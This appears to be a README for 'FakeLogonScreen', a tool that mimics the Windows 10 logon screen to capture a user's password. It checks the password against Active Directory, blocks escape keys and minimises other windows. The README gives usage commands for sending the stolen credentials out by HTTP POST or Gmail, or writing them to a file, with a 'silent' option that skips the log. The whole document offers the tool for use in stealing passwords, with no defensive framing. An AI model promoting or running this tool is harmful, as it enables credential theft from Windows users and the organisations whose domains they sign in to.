FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user's password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk.
It can either be executed by simply running the .exe file with the appropriate commands.
Binaries available from the Releases page. Binaries are Built against .NET Framework 4.5 which is installed by default in Windows 8, 8.1 and 10
- Primary display shows a Windows 10 login screen while additional screens turn black
- If custom background is configured by the user, shows that background instead of the default one
- Validates entered password before closing the screen
- Username and passwords entered are outputted to console or stored in a file
- Blocks many shortkeys to prevent circumventing the screen
- Minimizes all existing windows to avoid other windows staying on top
- Send results through either http, gmail, or to a file
FakeLogonScreen accepts these parameters:
| Option | Description |
|---|---|
http [url] |
Sends results to url as a json post request with the results contianed in "results" |
gmail [email] [password] |
Sends a email to the specified email (Note: You must enable less apps accesss here |
file [filepath] |
writes results to the file specified |
FakeLogonScreen normally will make a log.txt file but if you append silent to the end it will not. |
You can create your own server or you can use DuckyServer, a pre built server.
FakeLogonScreen.exe http http:/127.0.0.1/fake_login_screen silent
To use Gmail make sure you go to https://www.google.com/settings/security/lesssecureapps and enable "Allow less secure apps" for the account you will use.
FakeLogonScreen.exe gmail testaccount@gmail.com testpassword silent
Just specify the file you would like FakeLogonScreen to write to.
FakeLogonScreen.exe file C:\Users\test\passwords.txt